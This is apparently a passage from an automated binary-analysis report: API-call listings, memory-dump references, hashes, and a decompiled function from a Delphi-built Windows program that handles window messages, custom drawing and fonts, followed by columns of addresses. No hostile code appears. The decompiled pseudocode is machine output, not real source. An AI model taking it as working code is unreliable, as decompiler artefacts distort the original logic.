                                                                        0x00405b35
                                                                        0x00405b1f
                                                                        0x00405c72
                                                                        0x00405c7b

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405B05
                                                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405B16
                                                                        • lstrcpyn.KERNEL32(?,?,?,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B46
                                                                        • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405BAA
                                                                        • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5,?,80000001), ref: 00405BDF
                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000,00405DA5), ref: 00405BF2
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48,00000000), ref: 00405BFF
                                                                        • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047A08C,?,00405D48), ref: 00405C0B
                                                                        • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C3F
                                                                        • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C4B
                                                                        • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C6D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                        • API String ID: 3245196872-1565342463
                                                                        • Opcode ID: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
                                                                        • Instruction ID: 73109fc7617de6927649651d2e73acf26c869defa74ee943d75a78e36df64a33
                                                                        • Opcode Fuzzy Hash: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
                                                                        • Instruction Fuzzy Hash: D441837190465CABEB10EAA8CC85EDFB7ECDF05304F1401B6B949F7291D678AE408F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004759E0, Relevance: 18.4, APIs: 7, Strings: 3, Instructions: 909COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E004759E0(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v20;
				intOrPtr _v24;
				char _v28;
				void* _v29;
				char _v30;
				signed char _v36;
				intOrPtr* _v40;
				void* _v56;
				intOrPtr _v92;
				char _v96;
				struct tagLOGFONTA _v156;
				char _v160;
				char _v168;
				intOrPtr _t463;
				signed int _t464;
				intOrPtr _t465;
				signed int _t474;
				signed int _t478;
				intOrPtr _t528;
				intOrPtr _t529;
				intOrPtr _t535;
				intOrPtr _t542;
				intOrPtr _t543;
				signed int _t557;
				intOrPtr _t567;
				intOrPtr _t578;
				intOrPtr _t591;
				signed int _t596;
				signed int _t598;
				signed int _t600;
				signed int _t603;
				signed int _t605;
				signed int _t607;
				intOrPtr _t609;
				intOrPtr _t610;
				signed int _t612;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				signed int _t643;
				signed int _t646;
				signed int _t655;
				signed int _t657;
				signed int _t666;
				signed int _t671;
				intOrPtr _t685;
				signed int _t687;
				intOrPtr _t688;
				intOrPtr _t689;
				signed int _t702;
				intOrPtr _t703;
				signed int _t715;
				signed int _t720;
				signed int _t724;
				intOrPtr _t732;
				void* _t741;
				void* _t744;
				void* _t747;
				void* _t753;
				void* _t759;
				void* _t761;
				intOrPtr _t762;
				intOrPtr* _t766;
				void* _t769;
				signed int _t778;
				signed int _t781;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				void* _t808;
				intOrPtr _t818;
				void* _t824;
				intOrPtr _t833;
				signed int _t854;
				intOrPtr _t855;
				struct HWND__* _t858;
				intOrPtr _t864;
				signed char* _t866;
				intOrPtr _t880;
				intOrPtr _t916;
				intOrPtr _t921;
				intOrPtr _t938;
				intOrPtr _t942;
				intOrPtr _t951;
				intOrPtr _t965;
				void* _t999;
				void* _t1002;
				intOrPtr _t1022;
				signed int _t1025;
				void* _t1026;
				intOrPtr _t1029;
				intOrPtr _t1031;
				signed char* _t1042;
				intOrPtr _t1043;
				signed int _t1045;
				signed int _t1046;
				void* _t1049;
				void* _t1050;
				intOrPtr _t1051;
				void* _t1052;
				void* _t1053;

				_t1020 = __edi;
				_t1049 = _t1050;
				_t1051 = _t1050 + 0xffffff5c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v160 = 0;
				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t1049);
				_push(0x47669d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1051;
				_t1029 =  *((intOrPtr*)(_v12 + 8));
				_t463 =  *((intOrPtr*)(_t1029 + 8));
				_t1052 = _t463 - 0xffffff97;
				if(_t1052 > 0) {
					__eflags = _t463 - 0xffffff9c;
					if(__eflags > 0) {
						_t464 = _t463 - 0xfffffff4;
						__eflags = _t464;
						if(_t464 == 0) {
							_t465 = _v8;
							_t466 =  *(_t465 + 0x210);
							__eflags =  *(_t465 + 0x210);
							if( *(_t465 + 0x210) == 0) {
								goto L150;
							} else {
								_t833 = _t1029;
								_push(_t1049);
								_push(0x4761bb);
								_push( *[fs:edx]);
								 *[fs:edx] = _t1051;
								E00420398(_t466);
								 *(_v12 + 0xc) = 0;
								_t474 =  *(_t833 + 0xc);
								__eflags = _t474 & 0x00010000;
								if((_t474 & 0x00010000) != 0) {
									__eflags = _t474 & 0x00020000;
									_v30 = (_t474 & 0x00020000) != 0;
									__eflags = _v30;
									if(_v30 == 0) {
										L57:
										E00402EF0( &_v96, 0x28);
										_v92 =  *((intOrPtr*)(_t833 + 0x24));
										__eflags =  *(_t833 + 0xc) & 0x00010002;
										if(( *(_t833 + 0xc) & 0x00010002) != 0) {
											_t578 = _v8;
											_t951 = _v8;
											__eflags =  *((intOrPtr*)(_t578 + 0x298)) +  *((intOrPtr*)(_t951 + 0x29c));
											if( *((intOrPtr*)(_t578 + 0x298)) +  *((intOrPtr*)(_t951 + 0x29c)) != 0) {
												SelectObject( *(_t833 + 0x10),  *(_v8 + 0x29c));
												DeleteObject( *(_v8 + 0x298));
												 *(_v8 + 0x298) = 0;
												__eflags = 0;
												 *(_v8 + 0x29c) = 0;
											}
										}
										_t478 =  *(_t833 + 0xc);
										__eflags = _t478 & 0x00010001;
										if((_t478 & 0x00010001) == 0) {
											__eflags = _t478 & 0x00010002;
											if((_t478 & 0x00010002) == 0) {
												__eflags = _t478 & 0x00010003;
												if((_t478 & 0x00010003) == 0) {
													__eflags = _t478 & 0x00010004;
													if((_t478 & 0x00010004) != 0) {
														__eflags = _v30;
														if(_v30 == 0) {
															E0047582C(_t833,  &_v96, _t1020, _t1029);
															 *((intOrPtr*)( *_v8 + 0x100))(3);
														} else {
															E0047582C(_t833,  &_v96, _t1020, _t1029);
															 *((intOrPtr*)( *_v8 + 0x104))(3,  *((intOrPtr*)(_t833 + 0x28)));
														}
													}
												} else {
													__eflags = _v30;
													if(_v30 == 0) {
														E0047582C(_t833,  &_v96, _t1020, _t1029);
														 *((intOrPtr*)( *_v8 + 0x100))(2);
													} else {
														E0047582C(_t833,  &_v96, _t1020, _t1029);
														 *((intOrPtr*)( *_v8 + 0x104))(2,  *((intOrPtr*)(_t833 + 0x28)));
													}
												}
											} else {
												__eflags = _v30;
												if(_v30 == 0) {
													E0047582C(_t833,  &_v96, _t1020, _t1029);
													 *((intOrPtr*)( *_v8 + 0x100))(1);
												} else {
													E0047582C(_t833,  &_v96, _t1020, _t1029);
													 *((intOrPtr*)( *_v8 + 0x104))(1,  *((intOrPtr*)(_t833 + 0x28)));
												}
											}
											goto L82;
										} else {
											_push(_t1049);
											_push(0x475ff5);
											_push( *[fs:edx]);
											 *[fs:edx] = _t1051;
											E004207B0( *((intOrPtr*)(_v8 + 0x210)),  *(_t833 + 0x10));
											E0042062C( *((intOrPtr*)(_v8 + 0x210)));
											E00420648( *((intOrPtr*)(_v8 + 0x210)));
											_t528 =  *((intOrPtr*)(_v8 + 0x210));
											_t938 =  *((intOrPtr*)(_t528 + 0xc));
											 *((intOrPtr*)(_t938 + 0xc)) = _v8;
											 *((intOrPtr*)(_t938 + 8)) = 0x477760;
											_t529 =  *((intOrPtr*)(_t528 + 0x14));
											 *((intOrPtr*)(_t529 + 0xc)) = _v8;
											 *((intOrPtr*)(_t529 + 8)) = 0x477760;
											 *((char*)(_v8 + 0x28a)) = 0;
											__eflags = _v30;
											if(_v30 == 0) {
												E0047582C(_t833,  &_v96, _t1020, _t1029);
												_t880 =  *((intOrPtr*)(_t833 + 0x28));
												_v13 =  *((intOrPtr*)( *_v8 + 0x100))(0);
											} else {
												E0047582C(_t833,  &_v96, _t1020, _t1029);
												_t153 =  &_v12; // 0x477760
												_t155 =  *((intOrPtr*)( *_t153 + 8)) + 0x38; // 0x367501fa
												_t880 =  *_t155;
												_v13 =  *((intOrPtr*)( *_v8 + 0x104))(0,  *((intOrPtr*)(_t833 + 0x28)));
											}
											__eflags = _v13;
											if(_v13 != 0) {
												_t535 = _v8;
												__eflags =  *((char*)(_t535 + 0x28a));
												if( *((char*)(_t535 + 0x28a)) != 0) {
													 *((char*)(_v8 + 0x28a)) = 0;
													_t1031 =  *((intOrPtr*)(_v8 + 0x210));
													_t542 =  *((intOrPtr*)(_t1031 + 0xc));
													 *((intOrPtr*)(_t542 + 8)) = 0;
													 *((intOrPtr*)(_t542 + 0xc)) = 0;
													_t543 =  *((intOrPtr*)(_t1031 + 0x14));
													 *((intOrPtr*)(_t543 + 8)) = 0;
													 *((intOrPtr*)(_t543 + 0xc)) = 0;
													_t181 =  &_v12; // 0x477760
													_t1022 =  *((intOrPtr*)( *_t181 + 8));
													 *((intOrPtr*)(_t1022 + 0x30)) = E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_t1031 + 0xc)) + 0x18)));
													 *((intOrPtr*)(_t1022 + 0x34)) = E0041EFA4(E0041FC48( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x210)) + 0x14))));
													_t557 = GetObjectA(E0041F478( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x210)) + 0xc)), _t833, _t880), 0x3c,  &_v156);
													__eflags = _t557;
													if(_t557 != 0) {
														E004207B0( *((intOrPtr*)(_v8 + 0x210)), 0);
														 *(_v8 + 0x298) = CreateFontIndirectA( &_v156);
														 *(_v8 + 0x29c) = SelectObject( *(_t833 + 0x10),  *(_v8 + 0x298));
														_t204 =  &_v12; // 0x477760
														_t567 =  *_t204;
														_t205 = _t567 + 0xc;
														 *_t205 =  *(_t567 + 0xc) | 0x00000002;
														__eflags =  *_t205;
													}
												}
												_pop(_t942);
												 *[fs:eax] = _t942;
												_push(0x475ffc);
												__eflags = 0;
												return E004207B0( *((intOrPtr*)(_v8 + 0x210)), 0);
											} else {
												_t166 =  &_v12; // 0x477760
												 *( *_t166 + 0xc) =  *( *_t166 + 0xc) | 0x00000004;
												E00403E54();
												E00403E54();
												goto L150;
											}
										}
									} else {
										_t591 =  *((intOrPtr*)(_v12 + 8));
										__eflags =  *(_t591 + 0x38);
										if( *(_t591 + 0x38) != 0) {
											goto L57;
										} else {
											E00403E54();
											goto L150;
										}
									}
								} else {
									 *((intOrPtr*)( *_v8 + 0x44))();
									_t596 =  *(_t833 + 0xc) - 1;
									__eflags = _t596;
									if(_t596 == 0) {
										_t598 =  *((intOrPtr*)( *_v8 + 0x120))();
										__eflags = _t598;
										if(_t598 == 0) {
											_t600 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t600;
											if(_t600 != 0) {
												L41:
												 *(_v12 + 0xc) = 0x20;
											} else {
												_t612 =  *((intOrPtr*)( *_v8 + 0x120))();
												__eflags = _t612;
												if(_t612 != 0) {
													goto L41;
												}
											}
											_t603 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t603;
											if(_t603 != 0) {
												_t610 = _v12;
												_t70 = _t610 + 0xc;
												 *_t70 =  *(_t610 + 0xc) | 0x00000010;
												__eflags =  *_t70;
											}
											_t605 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t605;
											if(_t605 != 0) {
												_t609 = _v12;
												_t75 = _t609 + 0xc;
												 *_t75 =  *(_t609 + 0xc) | 0x00000040;
												__eflags =  *_t75;
											}
											_t607 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t607;
											if(_t607 != 0) {
												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000020;
											}
											goto L82;
										} else {
											 *[fs:eax] = _t1051;
											E004207B0( *((intOrPtr*)(_v8 + 0x210)),  *(_t833 + 0x10));
											E0042062C( *((intOrPtr*)(_v8 + 0x210)));
											E00420648( *((intOrPtr*)(_v8 + 0x210)));
											_v13 =  *((intOrPtr*)( *_v8 + 0xfc))( *[fs:eax], 0x475c4d, _t1049);
											_pop(_t965);
											 *[fs:eax] = _t965;
											_push(0x475c54);
											__eflags = 0;
											return E004207B0( *((intOrPtr*)(_v8 + 0x210)), 0);
										}
									} else {
										_t631 = _t596 - 1;
										__eflags = _t631;
										if(_t631 == 0) {
											_t633 =  *((intOrPtr*)( *_v8 + 0x120))();
											__eflags = _t633;
											if(_t633 != 0) {
												 *((intOrPtr*)( *_v8 + 0xfc))();
											}
										} else {
											_t636 = _t631 - 1;
											__eflags = _t636;
											if(_t636 == 0) {
												_t638 =  *((intOrPtr*)( *_v8 + 0x120))();
												__eflags = _t638;
												if(_t638 != 0) {
													 *((intOrPtr*)( *_v8 + 0xfc))();
												}
											} else {
												__eflags = _t636 == 1;
												if(_t636 == 1) {
													_t643 =  *((intOrPtr*)( *_v8 + 0x120))();
													__eflags = _t643;
													if(_t643 != 0) {
														 *((intOrPtr*)( *_v8 + 0xfc))();
													}
												}
											}
										}
										L82:
										__eflags = 0;
										_pop(_t921);
										 *[fs:eax] = _t921;
										_push(0x47667c);
										return E00420604( *((intOrPtr*)(_v8 + 0x210)));
									}
								}
							}
						} else {
							_t646 = _t464 - 7;
							__eflags = _t646;
							if(_t646 == 0) {
								 *((char*)(_v8 + 0x231)) = 1;
							} else {
								__eflags = _t646 == 3;
								if(_t646 == 3) {
									 *((char*)(_v8 + 0x230)) = 1;
								}
							}
							goto L150;
						}
					} else {
						if(__eflags == 0) {
							E00473994( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t1029 + 0xc)), __eflags);
							_t655 = E004037D8(_v8, __eflags);
							__eflags = _t655;
							if(_t655 == 0) {
								 *(_v12 + 0xc) = 1;
							}
						} else {
							_t657 = _t463 - 0xffffff98;
							__eflags = _t657;
							if(__eflags == 0) {
								_t854 = E00473964( *((intOrPtr*)(_v8 + 0x22c)), __eflags) - 1;
								__eflags = _t854;
								if(__eflags >= 0) {
									do {
										E00473994( *((intOrPtr*)(_v8 + 0x22c)), _t854, __eflags);
										E004037D8(_v8, __eflags);
										_t854 = _t854 - 1;
										__eflags = _t854 - 0xffffffff;
									} while (__eflags != 0);
								}
							} else {
								_t666 = _t657 - 1;
								__eflags = _t666;
								if(__eflags == 0) {
									E004037D8(_v8, __eflags);
								} else {
									_t671 = _t666 - 1;
									__eflags = _t671;
									if(__eflags == 0) {
										E00473994( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t1029 + 0xc)), __eflags);
										E004037D8(_v8, __eflags);
									} else {
										__eflags = _t671 - 1;
										if(__eflags == 0) {
											_t855 = _t1029;
											E00473994( *((intOrPtr*)(_v8 + 0x22c)),  *((intOrPtr*)(_t855 + 0xc)), __eflags);
											E004037D8(_v8, __eflags);
											_t685 = _v8;
											__eflags =  *((short*)(_t685 + 0x36a));
											if( *((short*)(_t685 + 0x36a)) != 0) {
												__eflags =  *((intOrPtr*)(_t855 + 0x1c)) - 8;
												if( *((intOrPtr*)(_t855 + 0x1c)) == 8) {
													__eflags =  *(_t855 + 0x18) & 0x00000002;
													if(( *(_t855 + 0x18) & 0x00000002) == 0) {
														L139:
														__eflags =  *(_t855 + 0x18) & 0x00000002;
														if(( *(_t855 + 0x18) & 0x00000002) == 0) {
															__eflags =  *(_t855 + 0x14) & 0x00000002;
															if(( *(_t855 + 0x14) & 0x00000002) != 0) {
																 *((intOrPtr*)(_v8 + 0x368))(1);
															}
														}
													} else {
														__eflags =  *(_t855 + 0x14) & 0x00000002;
														if(( *(_t855 + 0x14) & 0x00000002) != 0) {
															goto L139;
														} else {
															 *((intOrPtr*)(_v8 + 0x368))(0);
														}
													}
												}
											}
											_t687 =  *((intOrPtr*)( *_v8 + 0x3c))();
											__eflags = _t687;
											if(_t687 != 0) {
												_t688 = _v8;
												__eflags =  *(_t688 + 0x1c) & 0x00000010;
												if(( *(_t688 + 0x1c) & 0x00000010) == 0) {
													_t689 = _v8;
													__eflags =  *(_t689 + 0x6c);
													if( *(_t689 + 0x6c) != 0) {
														 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x6c)))) + 0x18))();
													}
												}
											}
										} else {
										}
									}
								}
							}
						}
						goto L150;
					}
				} else {
					if(_t1052 == 0) {
						E0047582C(__ebx,  *((intOrPtr*)(_v12 + 8)) + 0xc, __edi, _t1029);
						_t702 = E004037D8(_v8, __eflags);
						__eflags = _t702;
						if(_t702 == 0) {
							 *(_v12 + 0xc) = 1;
						}
						_t703 = _v12;
						__eflags =  *(_t703 + 0xc);
						if( *(_t703 + 0xc) == 0) {
							_t858 = E00426CC8(E0043CC2C(_v8));
							 *(_v8 + 0x258) = _t858;
							 *((intOrPtr*)(_v8 + 0x254)) = GetWindowLongA(_t858, 0xfffffffc);
							SetWindowLongA( *(_v8 + 0x258), 0xfffffffc,  *(_v8 + 0x250));
						}
					} else {
						_t1053 = _t463 - 0xffffff8d;
						if(_t1053 > 0) {
							_t715 = _t463 - 0xffffff8f;
							__eflags = _t715;
							if(_t715 == 0) {
								 *((intOrPtr*)( *_v8 + 0x118))();
							} else {
								_t720 = _t715 - 4;
								__eflags = _t720;
								if(_t720 == 0) {
									 *(_v8 + 0x26c) =  *( *((intOrPtr*)(_v12 + 8)) + 0xc);
								} else {
									_t724 = _t720 - 1;
									__eflags = _t724;
									if(__eflags == 0) {
										E00476F10(_v8);
										E004037D8(_v8, __eflags);
									} else {
										__eflags = _t724 == 2;
										if(_t724 == 2) {
											_t732 = _t1029;
											__eflags =  *(_t732 + 0x20);
											if( *(_t732 + 0x20) != 0) {
												__eflags =  *((intOrPtr*)(_t732 + 0x10)) - 0xffffffff;
												if(__eflags != 0) {
													E004037D8(_v8, __eflags);
												}
											}
										}
									}
								}
							}
						} else {
							if(_t1053 == 0) {
								 *((intOrPtr*)( *_v8 + 0x11c))(E00475994( *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 0x18))), E00475994( *((intOrPtr*)( *((intOrPtr*)(_v12 + 8)) + 0x14))));
							} else {
								_t741 = _t463 - 0xfffffecc;
								if(_t741 == 0) {
									_t1042 =  *(_t1029 + 0x14);
									__eflags =  *_t1042 & 0x00000001;
									if(( *_t1042 & 0x00000001) != 0) {
										_t744 = E00476F10(_v8);
										__eflags =  *((intOrPtr*)(_t744 + 0x18)) - _t1042[4];
										if( *((intOrPtr*)(_t744 + 0x18)) < _t1042[4]) {
											_t747 = E00476F10(_v8);
											__eflags =  *((intOrPtr*)(_t747 + 0x14)) - _t1042[4];
											if( *((intOrPtr*)(_t747 + 0x14)) <= _t1042[4]) {
												_push( *((intOrPtr*)(E00476F10(_v8) + 0x14)));
												_t753 = E00476F10(_v8);
												_pop(_t999);
												E00472AA4(_t753, _t999);
											}
										} else {
											_push( *((intOrPtr*)(E00476F10(_v8) + 0x18)));
											_t759 = E00476F10(_v8);
											_pop(_t1002);
											E00472AA4(_t759, _t1002);
										}
									}
								} else {
									_t761 = _t741 - 0x97;
									if(_t761 == 0) {
										_t762 = _v8;
										__eflags =  *((short*)(_t762 + 0x35a));
										if( *((short*)(_t762 + 0x35a)) != 0) {
											E004413CC( &_v168);
											_t766 =  *0x495ad0; // 0x496c04
											E004573E0( *_t766, __ebx,  &_v168, __edi, _t1029);
										}
									} else {
										_t769 = _t761 - 5;
										if(_t769 == 0) {
											_t864 = _t1029;
											_v14 = E00475970( *(_t864 + 0x10));
											_t1043 = 0;
											E00404348( &_v20);
											E004067C4(0,  &_v28, 0);
											_v29 = 4;
											_t778 = _v14 - 1;
											__eflags = _t778;
											if(_t778 < 0) {
												_t1043 =  *((intOrPtr*)(_t864 + 0x18));
											} else {
												__eflags = _t778 - 2;
												if(__eflags < 0) {
													_t1025 =  *(_t864 + 0x14);
													__eflags = _t1025;
													if(_t1025 == 0) {
														E00404348( &_v20);
													} else {
														E00408DF0(_t1025,  &_v20);
													}
												} else {
													if(__eflags == 0) {
														_v28 =  *((intOrPtr*)(_t864 + 0x1c));
														_v24 =  *((intOrPtr*)(_t864 + 0x20));
														_t795 =  *((intOrPtr*)(_t864 + 0x24)) - 0x25;
														__eflags = _t795;
														if(_t795 == 0) {
															_v29 = 0;
														} else {
															_t796 = _t795 - 1;
															__eflags = _t796;
															if(_t796 == 0) {
																_v29 = 2;
															} else {
																_t797 = _t796 - 1;
																__eflags = _t797;
																if(_t797 == 0) {
																	_v29 = 1;
																} else {
																	__eflags = _t797 == 1;
																	if(_t797 == 1) {
																		_v29 = 3;
																	}
																}
															}
														}
													}
												}
											}
											_t781 = _v29;
											__eflags =  *(_t864 + 0x10) & 0x00000020;
											E00475970( *(_t864 + 0x10));
											 *(_v12 + 0xc) =  *((intOrPtr*)( *_v8 + 0x114))(_t781 & 0xffffff00 | ( *(_t864 + 0x10) & 0x00000020) != 0x00000000, _t781,  *((intOrPtr*)(_t864 + 0xc)), _t1043,  &_v28);
										} else {
											if(_t769 == 2) {
												_t1026 = E0047582C(__ebx,  *((intOrPtr*)(_v12 + 8)) + 0xc, __edi, _t1029);
												_t866 =  *((intOrPtr*)(_v12 + 8)) + 0xc;
												__eflags =  *_t866 & 0x00000001;
												if(( *_t866 & 0x00000001) != 0) {
													_t1046 = _t866[8];
													__eflags = _t1046;
													if(_t1046 != 0) {
														_v40 =  *((intOrPtr*)(_t1026 + 8));
														_t824 =  *((intOrPtr*)( *_v40 + 0x14))();
														__eflags = _t1046 - _t824;
														if(_t1046 > _t824) {
															 *(_t866[0x14]) = 0;
														} else {
															 *((intOrPtr*)( *_v40 + 0xc))();
															E00408CB4(_t866[0x14], _t866[0x18] - 1, _v160);
														}
													} else {
														E00408CB4(_t866[0x14], _t866[0x18] - 1,  *((intOrPtr*)(_t1026 + 0x24)));
													}
												}
												__eflags =  *_t866 & 0x00000002;
												if(( *_t866 & 0x00000002) != 0) {
													__eflags = _t866[8];
													if(_t866[8] != 0) {
														_t1045 = _t866[8] - 1;
														__eflags = _t1045;
														if(_t1045 >= 0) {
															_t808 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1026 + 8)))) + 0x14))();
															__eflags = _t1045 - _t808;
															if(_t1045 < _t808) {
																_v36 = E00473828(_t1026);
																__eflags = _t866[8] - 1;
																E00477A28(_v8, _t866[8] - 1, _t1026,  &_v36);
																_t866[0x1c] = _v36;
															}
														}
													} else {
														E00476F9C(_v8, _t1026);
														_t866[0x1c] =  *(_t1026 + 0x10);
														_t818 = _v8;
														__eflags =  *(_t818 + 0x220);
														if( *(_t818 + 0x220) != 0) {
															_t866[0xc] = E00426B9C( *((intOrPtr*)(_t1026 + 0x20)) + 1);
															_t866[0x10] = 0xf000;
															 *_t866 =  *_t866 | 0x00000008;
														}
													}
												}
												__eflags =  *_t866 & 0x00000010;
												if(( *_t866 & 0x00000010) != 0) {
													_t866[0x24] =  *(_t1026 + 0x14);
												}
											}
										}
									}
								}
							}
						}
					}
					L150:
					_pop(_t916);
					 *[fs:eax] = _t916;
					_push(0x4766a4);
					E00404348( &_v160);
					return E00404348( &_v20);
				}
			}













































































































                                                                        0x004759e0
                                                                        0x004759e1
                                                                        0x004759e3
                                                                        0x004759e9
                                                                        0x004759ea
                                                                        0x004759eb
                                                                        0x004759ee
                                                                        0x004759f4
                                                                        0x004759f7
                                                                        0x004759fa
                                                                        0x004759ff
                                                                        0x00475a00
                                                                        0x00475a05
                                                                        0x00475a08
                                                                        0x00475a0e
                                                                        0x00475a11
                                                                        0x00475a14
                                                                        0x00475a17
                                                                        0x00475a7e
                                                                        0x00475a81
                                                                        0x00475aac
                                                                        0x00475aac
                                                                        0x00475aaf
                                                                        0x00475b51
                                                                        0x00475b54
                                                                        0x00475b5a
                                                                        0x00475b5c
                                                                        0x00000000
                                                                        0x00475b62
                                                                        0x00475b65
                                                                        0x00475b69
                                                                        0x00475b6a
                                                                        0x00475b6f
                                                                        0x00475b72
                                                                        0x00475b75
                                                                        0x00475b7f
                                                                        0x00475b82
                                                                        0x00475b85
                                                                        0x00475b8a
                                                                        0x00475d79
                                                                        0x00475d7e
                                                                        0x00475d82
                                                                        0x00475d86
                                                                        0x00475d9e
                                                                        0x00475da8
                                                                        0x00475db0
                                                                        0x00475db3
                                                                        0x00475dba
                                                                        0x00475dbc
                                                                        0x00475dc5
                                                                        0x00475dce
                                                                        0x00475dd0
                                                                        0x00475de0
                                                                        0x00475def
                                                                        0x00475df9
                                                                        0x00475e02
                                                                        0x00475e04
                                                                        0x00475e04
                                                                        0x00475dd0
                                                                        0x00475e0a
                                                                        0x00475e0d
                                                                        0x00475e12
                                                                        0x00476096
                                                                        0x0047609b
                                                                        0x004760f3
                                                                        0x004760f8
                                                                        0x0047614a
                                                                        0x0047614f
                                                                        0x00476151
                                                                        0x00476155
                                                                        0x00476189
                                                                        0x00476199
                                                                        0x00476157
                                                                        0x00476164
                                                                        0x00476179
                                                                        0x00476179
                                                                        0x00476155
                                                                        0x004760fa
                                                                        0x004760fa
                                                                        0x004760fe
                                                                        0x00476132
                                                                        0x00476142
                                                                        0x00476100
                                                                        0x0047610d
                                                                        0x00476122
                                                                        0x00476122
                                                                        0x004760fe
                                                                        0x0047609d
                                                                        0x0047609d
                                                                        0x004760a1
                                                                        0x004760d8
                                                                        0x004760e8
                                                                        0x004760a3
                                                                        0x004760b0
                                                                        0x004760c5
                                                                        0x004760c5
                                                                        0x004760a1
                                                                        0x00000000
                                                                        0x00475e18
                                                                        0x00475e1a
                                                                        0x00475e1b
                                                                        0x00475e20
                                                                        0x00475e23
                                                                        0x00475e32
                                                                        0x00475e46
                                                                        0x00475e5d
                                                                        0x00475e65
                                                                        0x00475e6b
                                                                        0x00475e71
                                                                        0x00475e74
                                                                        0x00475e7b
                                                                        0x00475e81
                                                                        0x00475e84
                                                                        0x00475e8e
                                                                        0x00475e95
                                                                        0x00475e99
                                                                        0x00475ed0
                                                                        0x00475ed7
                                                                        0x00475ee6
                                                                        0x00475e9b
                                                                        0x00475ea8
                                                                        0x00475eaf
                                                                        0x00475eb5
                                                                        0x00475eb5
                                                                        0x00475ec3
                                                                        0x00475ec3
                                                                        0x00475ee9
                                                                        0x00475eed
                                                                        0x00475f05
                                                                        0x00475f08
                                                                        0x00475f0f
                                                                        0x00475f18
                                                                        0x00475f22
                                                                        0x00475f28
                                                                        0x00475f2d
                                                                        0x00475f30
                                                                        0x00475f33
                                                                        0x00475f38
                                                                        0x00475f3b
                                                                        0x00475f3e
                                                                        0x00475f41
                                                                        0x00475f4f
                                                                        0x00475f68
                                                                        0x00475f86
                                                                        0x00475f8b
                                                                        0x00475f8d
                                                                        0x00475f9a
                                                                        0x00475fae
                                                                        0x00475fca
                                                                        0x00475fd0
                                                                        0x00475fd0
                                                                        0x00475fd3
                                                                        0x00475fd3
                                                                        0x00475fd3
                                                                        0x00475fd3
                                                                        0x00475f8d
                                                                        0x00475fd9
                                                                        0x00475fdc
                                                                        0x00475fdf
                                                                        0x00475fed
                                                                        0x00475ff4
                                                                        0x00475eef
                                                                        0x00475eef
                                                                        0x00475ef2
                                                                        0x00475ef6
                                                                        0x00475efb
                                                                        0x00000000
                                                                        0x00475efb
                                                                        0x00475eed
                                                                        0x00475d88
                                                                        0x00475d8b
                                                                        0x00475d8e
                                                                        0x00475d92
                                                                        0x00000000
                                                                        0x00475d94
                                                                        0x00475d94
                                                                        0x00000000
                                                                        0x00475d94
                                                                        0x00475d92
                                                                        0x00475b90
                                                                        0x00475b98
                                                                        0x00475b9e
